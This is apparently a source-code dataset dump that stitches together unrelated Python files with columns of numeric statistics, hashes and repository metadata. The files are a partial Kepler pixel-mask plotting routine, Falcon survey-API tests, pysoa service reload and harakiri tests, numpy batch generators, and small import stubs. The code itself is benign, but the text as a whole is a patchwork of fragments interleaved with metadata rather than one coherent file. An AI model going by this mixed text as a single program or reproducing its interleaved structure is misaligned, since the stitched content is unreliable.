if (not kepstat.bitInBitmap(maskimg[j + 1, 0], bit) and
kepstat.bitInBitmap(maskimg[j, 0], bit)):
x = np.array([pixcoord1[0, j], pixcoord1[1, j]]) - 0.5
y = np.array([pixcoord2[0, j], pixcoord2[0, j]]) + 0.5
plt.plot(x, y, color=lcolor, linestyle=lstyle, linewidth=lwidth)
except:
pass
if kepstat.bitInBitmap(maskimg[j, 0], bit):
x = np.array([pixcoord1[0,j],pixcoord1[0,j]]) - 0.5
try:
y = np.array([pixcoord2[0, j], pixcoord2[0, j + 1]]) - 0.5
except:
y = np.array([pixcoord2[0, j - 1], pixcoord2[0, j]]) + 0.5
plt.plot(x, y, color=lcolor, linestyle=lstyle, linewidth=lwidth)
if kepstat.bitInBitmap(maskimg[j, xdim - 1], bit):
x = np.array([pixcoord1[xdim - 1, j], pixcoord1[xdim - 1, j]]) + 0.5
try:
y = (np.array([pixcoord2[xdim - 1, j],
pixcoord2[xdim - 1, j + 1]]) - 0.5)
except:
y = (np.array([pixcoord2[xdim - 1, j - 1],
pixcoord2[xdim - 1, j]]) + 0.5)
plt.plot(x, y, color=lcolor, linestyle=lstyle, linewidth=lwidth)
for i in range(xdim):
try:
if (kepstat.bitInBitmap(maskimg[0, i], bit) and not
kepstat.bitInBitmap(maskimg[0, i - 1], bit)):
x = np.array([pixcoord1[i, 0], pixcoord1[i, 0]]) - 0.5
y = np.array([pixcoord2[i, 0], pixcoord2[i, 1]]) - 0.5
plt.plot(x, y, color=lcolor, linestyle=lstyle, linewidth=lwidth)
except:
pass
try:
if (not kepstat.bitInBitmap(maskimg[0, i + 1], bit) and
kepstat.bitInBitmap(maskimg[0, i], bit)):
x = np.array([pixcoord1[i, 0], pixcoord1[i, 0]]) + 0.5
y = np.array([pixcoord2[i, 0], pixcoord2[i, 1]]) - 0.5
plt.plot(x, y, color=lcolor, linestyle=lstyle,
linewidth=lwidth)
except:
pass
if kepstat.bitInBitmap(maskimg[0, i], bit):
try:
x = np.array([pixcoord1[i, 0], pixcoord1[i + 1, 0]]) - 0.5
except:
x = np.array([pixcoord1[i - 1, 0], pixcoord1[i, 0]]) + 0.5
y = np.array([pixcoord2[i,0],pixcoord2[i,0]]) - 0.5
plt.plot(x, y, color=lcolor, linestyle=lstyle, linewidth=lwidth)
if kepstat.bitInBitmap(maskimg[ydim - 1, i], bit):
try:
x = (np.array([pixcoord1[i, ydim - 1],
pixcoord1[i + 1, ydim-1]]) - 0.5)
except:
x = (np.array([pixcoord1[i - 1, ydim - 1],
pixcoord1[i, ydim - 1]]) - 0.5)
y = (np.array([pixcoord2[i, ydim - 1],
pixcoord2[i, ydim - 1]]) + 0.5)
plt.plot(x, y, color=lcolor, linestyle=lstyle, linewidth=lwidth)
if kepstat.bitInBitmap(maskimg[ydim - 1, xdim -1], bit):
x = (np.array([pixcoord1[xdim - 2, ydim - 1],
pixcoord1[xdim - 1, ydim - 1]]) + 0.5)
y = (np.array([pixcoord2[xdim - 1, ydim - 1],
pixcoord2[xdim - 1, ydim - 1]]) + 0.5)
plt.plot(x, y, color=lcolor, linestyle=lstyle, linewidth=lwidth)
if kepstat.bitInBitmap(maskimg[0, xdim - 1], bit):
x = np.array([pixcoord1[xdim - 1, 0], pixcoord1[xdim - 1, 0]]) + 0.5
y = np.array([pixcoord2[xdim - 1, 0], pixcoord2[xdim - 1, 1]]) - 0.5
plt.plot(x, y, color=lcolor, linestyle=lstyle, linewidth=lwidth)
| 43.116915
| 84
| 0.515087
| 2,345
| 17,333
| 3.804264
| 0.091684
| 0.056496
| 0.123305
| 0.06098
| 0.793633
| 0.783544
| 0.772335
| 0.747226
| 0.735344
| 0.723686
| 0
| 0.054033
| 0.328391
| 17,333
| 401
| 85
| 43.224439
| 0.71231
| 0.037212
| 0
| 0.755747
| 0
| 0
| 0.019549
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.031609
| false
| 0.022989
| 0.011494
| 0
| 0.063218
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
40248b59c2a3a7e2ac873ee376548f2f0cf9670c
| 8,445
|
py
|
Python
|
tests/controllers/test_survey.py
|
reputage/SQSurvey
|
938a59806fa0877205a1a460ceb23ecdf2fa9201
|
[
"Apache-2.0"
] | null | null | null |
tests/controllers/test_survey.py
|
reputage/SQSurvey
|
938a59806fa0877205a1a460ceb23ecdf2fa9201
|
[
"Apache-2.0"
] | null | null | null |
tests/controllers/test_survey.py
|
reputage/SQSurvey
|
938a59806fa0877205a1a460ceb23ecdf2fa9201
|
[
"Apache-2.0"
] | null | null | null |
import falcon
import uuid
try:
import simplejson as json
except ImportError:
import json
from didery.routing import *
from didery.db.dbing import BaseSurveyDB, DB, DB_SURVEY_RESULTS_NAME
def testSurveyPost(client):
surveyResult = {
"ip_address": "127.0.0.1"
}
response = client.simulate_post(SURVEY_BASE_PATH, body=json.dumps(surveyResult).encode())
resp_data = json.loads(response.content)
resp_key = list(resp_data.keys())[0]
assert len(resp_data) == 1
assert resp_data[resp_key]["survey_data"] == surveyResult
def testSurveyGetAll(client):
surveyResult = {
"ip_address": "127.0.0.1"
}
client.simulate_post(SURVEY_BASE_PATH, body=json.dumps(surveyResult).encode())
response = json.loads(client.simulate_get(SURVEY_BASE_PATH).content)
assert len(response["data"]) == 1
for survey in response["data"].values():
assert survey["survey_data"] == surveyResult
def testSurveyGet(client):
surveyResult = {
"ip_address": "127.0.0.1"
}
response = client.simulate_post(SURVEY_BASE_PATH, body=json.dumps(surveyResult).encode())
id = list(json.loads(response.content).keys())[0]
response = client.simulate_get("{}/{}".format(SURVEY_BASE_PATH, id))
assert json.loads(response.content)["survey_data"] == surveyResult
def testSurveyGetAllInvalidQueryString(client):
# Test that query params have values
response = client.simulate_get(SURVEY_BASE_PATH, query_string="offset&limit=10")
exp_result = {
"title": "Malformed Query String",
"description": "url query string missing value(s)."
}
assert response.status == falcon.HTTP_400
assert json.loads(response.content) == exp_result
response = client.simulate_get(SURVEY_BASE_PATH, query_string="offset=10&limit")
exp_result = {
"title": "Malformed Query String",
"description": "url query string missing value(s)."
}
assert response.status == falcon.HTTP_400
assert json.loads(response.content) == exp_result
def testSurveyGetAllInvalidQueryValue(client):
# Test that query params values are ints
response = client.simulate_get(SURVEY_BASE_PATH, query_string="offset=a&limit=10")
exp_result = {
"title": "Malformed Query String",
"description": "url query string value must be a number."
}
assert response.status == falcon.HTTP_400
assert json.loads(response.content) == exp_result
response = client.simulate_get(SURVEY_BASE_PATH, query_string="offset=10&limit=d")
exp_result = {
"title": "Malformed Query String",
"description": "url query string value must be a number."
}
assert response.status == falcon.HTTP_400
assert json.loads(response.content) == exp_result
def testSurveyGetAllNegativeQueryValue(client):
# Test that query params values are ints
response = client.simulate_get(SURVEY_BASE_PATH, query_string="offset=-1&limit=10")
exp_result = {
"title": "Malformed Query String",
"description": "url query string value must be a positive number."
}
assert response.status == falcon.HTTP_400
assert json.loads(response.content) == exp_result
response = client.simulate_get(SURVEY_BASE_PATH, query_string="offset=0&limit=-10")
exp_result = {
"title": "Malformed Query String",
"description": "url query string value must be a positive number."
}
assert response.status == falcon.HTTP_400
assert json.loads(response.content) == exp_result
def testSurveyGetAllEmptyQueryValue(client):
response = client.simulate_get(SURVEY_BASE_PATH, query_string="offset=10&limit=")
exp_result = {
"title": "Malformed Query String",
"description": "url query string value must be a number."
}
assert response.status == falcon.HTTP_400
assert json.loads(response.content) == exp_result
response = client.simulate_get(SURVEY_BASE_PATH, query_string="offset=&limit=10")
exp_result = {
"title": "Malformed Query String",
"description": "url query string value must be a number."
}
assert response.status == falcon.HTTP_400
assert json.loads(response.content) == exp_result
def testValidGetAllWithQueryString(client):
db = BaseSurveyDB(DB(DB_SURVEY_RESULTS_NAME))
exp_result = {"data": {}}
for i in range(0, 11):
history = {
"id": "did:dad:NOf6ZghvGNbFc_wr3CC0tKZHz1qWAR4lD5aM-i0zSjw=",
"changed": "2000-01-01T00:00:01+00:00",
"signer": 1,
"signers": [
"NOf6ZghvGNbFc_wr3CC0tKZHz1qWAR4lD5aM-i0zSjw=",
"NOf6ZghvGNbFc_wr3CC0tKZHz1qWAR4lD5aM-i0zSjw=",
"NOf6ZghvGNbFc_wr3CC0tKZHz1qWAR4lD5aM-i0zSjw="
]
}
uid = str(uuid.uuid4())
db.save(uid, history)
exp_result["data"][uid] = history
response = client.simulate_get(SURVEY_BASE_PATH, query_string="offset=0&limit=11")
result = json.loads(response.content)
assert response.status == falcon.HTTP_200
assert result == exp_result
response = client.simulate_get(SURVEY_BASE_PATH, query_string="offset=0&limit=20")
result = json.loads(response.content)
assert response.status == falcon.HTTP_200
assert result == exp_result
response = client.simulate_get(SURVEY_BASE_PATH, query_string="offset=0&limit=0")
result = json.loads(response.content)
exp_result = {"data": {}}
assert response.status == falcon.HTTP_200
assert result == exp_result
response = client.simulate_get(SURVEY_BASE_PATH, query_string="offset=100&limit=10")
assert response.status == falcon.HTTP_200
assert json.loads(response.content) == exp_result
def testPostBodySize(client):
surveyResult = {
"Name": "xyz",
"Email": "xyz@domain.com",
"Response": {
"Rank each of the five game concepts on ease of navigation.-SeedQuest": "1",
"Rank each of the five game concepts on ease of navigation.-Cliffside": "1",
"Rank each of the five game concepts on ease of navigation.-Laboratory": "1",
"Rank each of the five game concepts on ease of navigation.-Mind Palace": "1",
"Rank each of the five game concepts on ease of navigation.-Flatlands": "1",
"Rank each of the five game concepts on how intuitive and enjoyable the gameplay is.-SeedQuest": "1",
"Rank each of the five game concepts on how intuitive and enjoyable the gameplay is.-Laboratory": "1",
"Rank each of the five game concepts on how intuitive and enjoyable the gameplay is.-Mind Palace": "1",
"Rank each of the five game concepts on how intuitive and enjoyable the gameplay is.-Flatlands": "1",
"Rank each of the five game concepts on how quickly you were able to learn the game path.-SeedQuest": "1",
"Rank each of the five game concepts on how quickly you were able to learn the game path.-Cliffside": "1",
"Rank each of the five game concepts on how quickly you were able to learn the game path.-Laboratory": "1",
"Rank each of the five game concepts on how quickly you were able to learn the game path.-Mind Palace": "1",
"Rank each of the five game concepts on how quickly you were able to learn the game path.-Flatlands": "1",
"Rank each of the five game concepts on overall experience.-SeedQuest": "4th",
"Rank each of the five game concepts on overall experience.-Cliffside": "3rd",
"Rank each of the five game concepts on overall experience.-Laboratory": "4th",
"Rank each of the five game concepts on overall experience.-Memory Palace": "5th",
"Rank each of the five game concepts on overall experience.-Flatlands": "5th",
"Do you have any other comments or suggestions about any of the game concepts-Game Navigation": "ewfsdcxcdsfewrfsdczxds",
"Do you have any other comments or suggestions about any of the game concepts-Memorability": "1",
"Do you have any other comments or suggestions about any of the game concepts-Art Style": "1"
}
}
data = json.dumps(surveyResult)
assert len(data) > 1000
response = client.simulate_post(SURVEY_BASE_PATH, body=json.dumps(surveyResult).encode())
assert response.status == falcon.HTTP_201
| 36.877729
| 133
| 0.678271
| 1,080
| 8,445
| 5.188889
| 0.149074
| 0.054961
| 0.033904
| 0.044076
| 0.800678
| 0.78444
| 0.739293
| 0.733405
| 0.720021
| 0.720021
| 0
| 0.025408
| 0.217052
| 8,445
| 228
| 134
| 37.039474
| 0.822142
| 0.013262
| 0
| 0.40625
| 0
| 0.00625
| 0.370633
| 0.050666
| 0
| 0
| 0
| 0
| 0.19375
| 1
| 0.05625
| false
| 0
| 0.04375
| 0
| 0.1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
40424aca71843a5d8a65b235194039f86d210ad3
| 39
|
py
|
Python
|
sandbox/michelle.py
|
writecrow/crow_training
|
17324ce93608acf997c2880b587dd9483729b895
|
[
"MIT"
] | 7
|
2018-02-27T15:24:10.000Z
|
2018-02-27T22:20:58.000Z
|
sandbox/michelle.py
|
writecrow/crow_training
|
17324ce93608acf997c2880b587dd9483729b895
|
[
"MIT"
] | 11
|
2018-02-21T03:07:44.000Z
|
2018-02-27T22:33:29.000Z
|
sandbox/michelle.py
|
writecrow/crow_training
|
17324ce93608acf997c2880b587dd9483729b895
|
[
"MIT"
] | null | null | null |
print("Hello Mark, This is Michelle.")
| 19.5
| 38
| 0.717949
| 6
| 39
| 4.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.128205
| 39
| 1
| 39
| 39
| 0.823529
| 0
| 0
| 0
| 0
| 0
| 0.74359
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 6
|
40b2f20c94f194cf5bff0b09adc65a2debeb1e55
| 160
|
py
|
Python
|
paz/optimization/__init__.py
|
niqbal996/paz
|
f27205907367415d5b21f90e1a1d1d1ce598e889
|
[
"MIT"
] | 300
|
2020-10-29T08:02:05.000Z
|
2022-03-30T21:47:32.000Z
|
paz/optimization/__init__.py
|
albertofernandezvillan/paz
|
9fbd50b993f37e1e807297a29c6044c09967c9cc
|
[
"MIT"
] | 30
|
2020-10-29T12:40:32.000Z
|
2022-03-31T14:06:35.000Z
|
paz/optimization/__init__.py
|
albertofernandezvillan/paz
|
9fbd50b993f37e1e807297a29c6044c09967c9cc
|
[
"MIT"
] | 62
|
2020-10-29T12:34:13.000Z
|
2022-03-29T05:21:45.000Z
|
from .losses import MultiBoxLoss
from .losses import KeypointNetLoss
from .losses import DiceLoss
from .losses import FocalLoss
from .losses import JaccardLoss
| 26.666667
| 35
| 0.84375
| 20
| 160
| 6.75
| 0.4
| 0.37037
| 0.592593
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 160
| 5
| 36
| 32
| 0.964286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
40d039b83d423a7126f84f03e449445afb22d6d6
| 3,249
|
py
|
Python
|
utility/feed_generation_utility.py
|
etfrenchvcu/DeepPrime2Sec
|
a61146c7c7d8a0f8821717b9f7aed8703cfdb2a1
|
[
"Apache-2.0"
] | 18
|
2019-07-17T01:53:03.000Z
|
2021-12-10T13:08:51.000Z
|
utility/feed_generation_utility.py
|
etfrenchvcu/DeepPrime2Sec
|
a61146c7c7d8a0f8821717b9f7aed8703cfdb2a1
|
[
"Apache-2.0"
] | 18
|
2019-10-13T02:45:50.000Z
|
2022-02-10T00:17:06.000Z
|
utility/feed_generation_utility.py
|
etfrenchvcu/DeepPrime2Sec
|
a61146c7c7d8a0f8821717b9f7aed8703cfdb2a1
|
[
"Apache-2.0"
] | 9
|
2019-07-26T01:16:26.000Z
|
2020-11-14T01:57:24.000Z
|
import numpy as np
from utility.file_utility import FileUtility
def train_batch_generator_408(batch_size=64):
'''
:param batch_size:
:return:
'''
start_idx = 0
train_lengths = [int(j) for j in FileUtility.load_list(
'datasets/train_length.txt')]
X_train = np.load('datasets/X_train_408.npy')
Y_train = np.array(
np.load('datasets/train_mat_Y.npy'))
while True:
if not start_idx < len(train_lengths):
start_idx = 0
X = X_train[start_idx:(min(start_idx + batch_size, len(train_lengths))),
0:train_lengths[min(start_idx + batch_size, len(train_lengths)) - 1]]
Y = Y_train[start_idx:(min(start_idx + batch_size, len(train_lengths))),
0:train_lengths[min(start_idx + batch_size, len(train_lengths)) - 1], :]
W = []
for idx in range(start_idx, (min(start_idx + batch_size, len(train_lengths)))):
W.append([1 if l < train_lengths[idx] else 0 for l in
range(0, train_lengths[min(start_idx + batch_size, len(train_lengths)) - 1])])
start_idx += batch_size
yield X, Y, np.array(W)
def validation_batch_generator_408(batch_size=100):
'''
:param batch_size:
:return:
'''
test_lengths = [int(i) for i in FileUtility.load_list(
'datasets/test_length.txt')]
X_test = np.load('datasets/X_test_408.npy')
Y_test = np.array(
np.load('datasets/test_mat_Y.npy'))
start_idx = 0
while True:
if not start_idx < len(test_lengths):
start_idx = 0
X = X_test[start_idx:(min(start_idx + batch_size, len(test_lengths))),
0:test_lengths[min(start_idx + batch_size, len(test_lengths)) - 1]]
Y = Y_test[start_idx:(min(start_idx + batch_size, len(test_lengths))),
0:test_lengths[min(start_idx + batch_size, len(test_lengths)) - 1], :]
W = []
for idx in range(start_idx, (min(start_idx + batch_size, len(test_lengths)))):
W.append([1 if l < test_lengths[idx] else 0 for l in
range(0, test_lengths[min(start_idx + batch_size, len(test_lengths)) - 1])])
start_idx += batch_size
yield X, Y, np.array(W)
def validation_batches_fortest_408(batchsize=100):
'''
:param batchsize:
:return:
'''
test_lengths = [int(i) for i in FileUtility.load_list(
'datasets/test_length.txt')]
X_test = np.load('datasets/X_test_408.npy')
Y_test = np.array(
np.load('datasets/test_mat_Y.npy'))
start_idx = 0
while start_idx < len(test_lengths):
X = X_test[start_idx:(min(start_idx + batchsize, len(test_lengths))),
0:test_lengths[min(start_idx + batchsize, len(test_lengths)) - 1]]
Y = Y_test[start_idx:(min(start_idx + batchsize, len(test_lengths))),
0:test_lengths[min(start_idx + batchsize, len(test_lengths)) - 1], :]
W = []
for idx in range(start_idx, (min(start_idx + batchsize, len(test_lengths)))):
W.append([1 if l < test_lengths[idx] else 0 for l in
range(0, test_lengths[min(start_idx + batchsize, len(test_lengths)) - 1])])
start_idx += batchsize
yield X, Y, np.array(W)
| 38.223529
| 100
| 0.61896
| 481
| 3,249
| 3.906445
| 0.114345
| 0.161788
| 0.105375
| 0.126663
| 0.862693
| 0.794572
| 0.758382
| 0.734433
| 0.732304
| 0.713677
| 0
| 0.022578
| 0.250231
| 3,249
| 84
| 101
| 38.678571
| 0.748768
| 0.025239
| 0
| 0.45
| 0
| 0
| 0.068511
| 0.068511
| 0
| 0
| 0
| 0
| 0
| 1
| 0.05
| false
| 0
| 0.033333
| 0
| 0.083333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
904bf72f33620fcf83e91de982459952e01f2ba1
| 53
|
py
|
Python
|
test/test_import.py
|
Rayman/toypkg
|
76f6862cdd4e923abd34d981c60cab292e7a4a29
|
[
"MIT"
] | null | null | null |
test/test_import.py
|
Rayman/toypkg
|
76f6862cdd4e923abd34d981c60cab292e7a4a29
|
[
"MIT"
] | null | null | null |
test/test_import.py
|
Rayman/toypkg
|
76f6862cdd4e923abd34d981c60cab292e7a4a29
|
[
"MIT"
] | null | null | null |
def test_import():
import toypkg
assert True
| 13.25
| 18
| 0.679245
| 7
| 53
| 5
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.264151
| 53
| 3
| 19
| 17.666667
| 0.897436
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.666667
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
9092763ab41a807d06102c41f57c4af2ff30b015
| 8,792
|
py
|
Python
|
tests/functional/test_yyy_forking_and_reloading.py
|
arareko/pysoa
|
a90e428558500cf692f7f6e33fd358dd2779c328
|
[
"Apache-2.0"
] | null | null | null |
tests/functional/test_yyy_forking_and_reloading.py
|
arareko/pysoa
|
a90e428558500cf692f7f6e33fd358dd2779c328
|
[
"Apache-2.0"
] | null | null | null |
tests/functional/test_yyy_forking_and_reloading.py
|
arareko/pysoa
|
a90e428558500cf692f7f6e33fd358dd2779c328
|
[
"Apache-2.0"
] | 1
|
2020-02-21T07:17:48.000Z
|
2020-02-21T07:17:48.000Z
|
from __future__ import (
absolute_import,
unicode_literals,
)
import time
import pytest
from pysoa.common.constants import ERROR_CODE_ACTION_TIMEOUT
from pysoa.common.transport.errors import MessageReceiveTimeout
from tests.functional import (
get_container_logs,
get_container_process_list,
read_file_from_container,
write_file_to_container,
)
def test_double_import_trap_killed_intended_service():
with pytest.raises(AssertionError) as error_context:
read_file_from_container('echo_service_double_import_trap', '/srv/echo_service-1.heartbeat')
assert 'No container found for echo_service_double_import_trap_1' in error_context.value.args[0]
assert 'ERROR: You have triggered a double-import trap' in get_container_logs('echo_service_double_import_trap')
def test_heartbeat_file_watching_no_forking(pysoa_client):
original_ts = float(read_file_from_container('meta_service', '/srv/meta_service-{{fid}}.heartbeat'))
assert original_ts > 0
time.sleep(2.5)
response = pysoa_client.call_action('meta', 'status')
assert response.body['version'] == '2.1.7'
new_ts = float(read_file_from_container('meta_service', '/srv/meta_service-{{fid}}.heartbeat'))
assert new_ts > original_ts
def test_heartbeat_file_forking_no_watching(pysoa_client):
original_ts_1 = float(read_file_from_container('user_service', '/srv/user_service-1.heartbeat'))
original_ts_2 = float(read_file_from_container('user_service', '/srv/user_service-2.heartbeat'))
original_ts_3 = float(read_file_from_container('user_service', '/srv/user_service-3.heartbeat'))
original_ts_4 = float(read_file_from_container('user_service', '/srv/user_service-4.heartbeat'))
assert original_ts_1 > 0
assert original_ts_2 > 0
assert original_ts_3 > 0
assert original_ts_4 > 0
time.sleep(2.5)
responses = pysoa_client.call_actions_parallel(
'user',
[
{'action': 'status'}, {'action': 'status'}, {'action': 'status'}, {'action': 'status'},
{'action': 'status'}, {'action': 'status'}, {'action': 'status'}, {'action': 'status'},
],
)
for response in responses:
assert response.body['version'] == '1.0.17'
new_ts_1 = float(read_file_from_container('user_service', '/srv/user_service-1.heartbeat'))
new_ts_2 = float(read_file_from_container('user_service', '/srv/user_service-2.heartbeat'))
new_ts_3 = float(read_file_from_container('user_service', '/srv/user_service-3.heartbeat'))
new_ts_4 = float(read_file_from_container('user_service', '/srv/user_service-4.heartbeat'))
assert new_ts_1 > original_ts_1
assert new_ts_2 > original_ts_2
assert new_ts_3 > original_ts_3
assert new_ts_4 > original_ts_4
def test_heartbeat_file_forking_and_watching(pysoa_client):
original_ts_1 = float(read_file_from_container('echo_service', '/srv/echo_service-1.heartbeat'))
original_ts_2 = float(read_file_from_container('echo_service', '/srv/echo_service-2.heartbeat'))
original_ts_3 = float(read_file_from_container('echo_service', '/srv/echo_service-3.heartbeat'))
assert original_ts_1 > 0
assert original_ts_2 > 0
assert original_ts_3 > 0
time.sleep(2.5)
responses = pysoa_client.call_actions_parallel(
'echo',
[
{'action': 'status'}, {'action': 'status'}, {'action': 'status'}, {'action': 'status'},
{'action': 'status'}, {'action': 'status'}, {'action': 'status'}, {'action': 'status'},
],
)
for response in responses:
assert response.body['version'] == '9.5.3'
new_ts_1 = float(read_file_from_container('echo_service', '/srv/echo_service-1.heartbeat'))
new_ts_2 = float(read_file_from_container('echo_service', '/srv/echo_service-2.heartbeat'))
new_ts_3 = float(read_file_from_container('echo_service', '/srv/echo_service-3.heartbeat'))
assert new_ts_1 > original_ts_1
assert new_ts_2 > original_ts_2
assert new_ts_3 > original_ts_3
def test_reload_no_forking(pysoa_client):
print(get_container_process_list('meta_service'))
assert read_file_from_container('meta_service', '/srv/meta/meta_service/version.py') == "__version__ = '2.1.7'"
write_file_to_container('meta_service', '/srv/meta/meta_service/version.py', "__version__ = '7.1.2'")
assert read_file_from_container('meta_service', '/srv/meta/meta_service/version.py') == "__version__ = '7.1.2'"
time.sleep(10)
print(get_container_process_list('meta_service'))
response = pysoa_client.call_action('meta', 'status')
assert response.body['version'] == '7.1.2'
def test_reload_with_forking(pysoa_client):
print(get_container_process_list('echo_service'))
assert read_file_from_container('echo_service', '/srv/echo/echo_service/version.py') == "__version__ = '9.5.3'"
write_file_to_container('echo_service', '/srv/echo/echo_service/version.py', "__version__ = '9.8.0'")
assert read_file_from_container('echo_service', '/srv/echo/echo_service/version.py') == "__version__ = '9.8.0'"
time.sleep(10)
print(get_container_process_list('echo_service'))
responses = pysoa_client.call_actions_parallel(
'echo',
[
{'action': 'status'}, {'action': 'status'}, {'action': 'status'}, {'action': 'status'},
{'action': 'status'}, {'action': 'status'}, {'action': 'status'}, {'action': 'status'},
],
)
for response in responses:
assert response.body['version'] == '9.8.0'
def test_no_reload_no_watcher(pysoa_client):
print(get_container_process_list('user_service'))
assert read_file_from_container('user_service', '/srv/user/user_service/version.py') == "__version__ = '1.0.17'"
write_file_to_container('user_service', '/srv/user/user_service/version.py', "__version__ = '1.2.1'")
assert read_file_from_container('user_service', '/srv/user/user_service/version.py') == "__version__ = '1.2.1'"
time.sleep(10)
print(get_container_process_list('user_service'))
responses = pysoa_client.call_actions_parallel(
'user',
[
{'action': 'status'}, {'action': 'status'}, {'action': 'status'}, {'action': 'status'},
{'action': 'status'}, {'action': 'status'}, {'action': 'status'}, {'action': 'status'},
],
)
for response in responses:
assert response.body['version'] == '1.0.17'
def test_harakiri_graceful_restart(pysoa_client):
original_ts_1 = float(read_file_from_container('echo_service', '/srv/echo_service-1.heartbeat'))
original_ts_2 = float(read_file_from_container('echo_service', '/srv/echo_service-2.heartbeat'))
original_ts_3 = float(read_file_from_container('echo_service', '/srv/echo_service-3.heartbeat'))
assert original_ts_1 > 0
assert original_ts_2 > 0
assert original_ts_3 > 0
print(get_container_process_list('echo_service'))
with pytest.raises(pysoa_client.CallActionError) as error_context:
pysoa_client.call_action('echo', 'harakiri_loop_graceful', timeout=12)
assert len(error_context.value.actions) == 1
assert len(error_context.value.actions[0].errors) == 1
assert error_context.value.actions[0].errors[0].code == ERROR_CODE_ACTION_TIMEOUT
print(get_container_process_list('echo_service'))
new_ts_1 = float(read_file_from_container('echo_service', '/srv/echo_service-1.heartbeat'))
new_ts_2 = float(read_file_from_container('echo_service', '/srv/echo_service-2.heartbeat'))
new_ts_3 = float(read_file_from_container('echo_service', '/srv/echo_service-3.heartbeat'))
assert new_ts_1 > original_ts_1
assert new_ts_2 > original_ts_2
assert new_ts_3 > original_ts_3
def test_harakiri_forceful_restart(pysoa_client):
original_ts_1 = float(read_file_from_container('echo_service', '/srv/echo_service-1.heartbeat'))
original_ts_2 = float(read_file_from_container('echo_service', '/srv/echo_service-2.heartbeat'))
original_ts_3 = float(read_file_from_container('echo_service', '/srv/echo_service-3.heartbeat'))
assert original_ts_1 > 0
assert original_ts_2 > 0
assert original_ts_3 > 0
print(get_container_process_list('echo_service'))
with pytest.raises(MessageReceiveTimeout):
pysoa_client.call_action('echo', 'harakiri_loop_forceful', timeout=12)
print(get_container_process_list('echo_service'))
new_ts_1 = float(read_file_from_container('echo_service', '/srv/echo_service-1.heartbeat'))
new_ts_2 = float(read_file_from_container('echo_service', '/srv/echo_service-2.heartbeat'))
new_ts_3 = float(read_file_from_container('echo_service', '/srv/echo_service-3.heartbeat'))
assert new_ts_1 > original_ts_1
assert new_ts_2 > original_ts_2
assert new_ts_3 > original_ts_3
| 42.47343
| 116
| 0.718039
| 1,223
| 8,792
| 4.741619
| 0.080131
| 0.098638
| 0.074496
| 0.130367
| 0.846525
| 0.818934
| 0.795482
| 0.764615
| 0.728057
| 0.728057
| 0
| 0.023544
| 0.144904
| 8,792
| 206
| 117
| 42.679612
| 0.747805
| 0
| 0
| 0.554839
| 0
| 0
| 0.297316
| 0.146611
| 0
| 0
| 0
| 0
| 0.296774
| 1
| 0.058065
| false
| 0
| 0.070968
| 0
| 0.129032
| 0.064516
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
290fb371e6a41d6496f17e9f9f6ddf955c8ffbd0
| 137
|
py
|
Python
|
hcap/settings/general/seed.py
|
fabiommendes/capacidade_hospitalar
|
4f675b574573eb3f51e6be8a927ea230bf2712c7
|
[
"MIT"
] | null | null | null |
hcap/settings/general/seed.py
|
fabiommendes/capacidade_hospitalar
|
4f675b574573eb3f51e6be8a927ea230bf2712c7
|
[
"MIT"
] | 31
|
2020-04-11T13:38:17.000Z
|
2021-09-22T18:51:11.000Z
|
hcap/settings/general/seed.py
|
fabiommendes/capacidade_hospitalar
|
4f675b574573eb3f51e6be8a927ea230bf2712c7
|
[
"MIT"
] | 1
|
2020-04-08T17:04:39.000Z
|
2020-04-08T17:04:39.000Z
|
from hcap.settings.env import env
# Used by user seed commands
